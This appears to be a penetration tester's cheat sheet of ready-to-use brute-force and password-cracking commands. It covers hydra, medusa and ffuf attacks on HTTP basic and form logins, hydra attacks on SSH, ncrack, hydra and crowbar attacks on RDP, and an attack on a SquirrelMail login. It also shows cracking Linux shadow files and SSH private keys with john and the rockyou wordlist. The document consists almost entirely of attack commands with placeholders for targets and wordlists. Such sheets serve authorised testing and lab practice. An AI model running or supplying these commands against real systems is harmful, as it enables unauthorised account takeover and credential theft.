Bruteforce

Basic Auth

hydra

hydra -L <USER_FILE> -P <PASS_FILE> -s 80 -f <IP> http-get /

medusa

medusa -h <IP> -u <USER> -P <PASS_FILE> -M http -m DIR:/webdav/ -T 10

Form Auth

hydra

hydra <IP> http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f

ffuf

ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206

SSH

hydra

hydra -l <USER> -P <PASS_FILE> ssh://<IP>

RDP

ncrack

ncrack -vv --user <USER> -P <PASS_FILE> rdp://<IP>

hydra

hydra -V -f -L <USER_LIST> -P <PASS_FILE> rdp://<IP>

crowbar

crowbar -b rdp -s <IP> -u <USER> -C <PASS_FILE> -n 1

Passwd shadow

Step 1

unshadow passwd.txt shadow.txt > pass_shad.txt

Step 2

john pass_shad.txt
john pass_shad.txt --wordlist=/usr/share/wordlists/rockyou.txt

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

SquirrelMail 1.2.10

hydra

hydra -l <USER> -P <PASS_FILE> <IP> http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u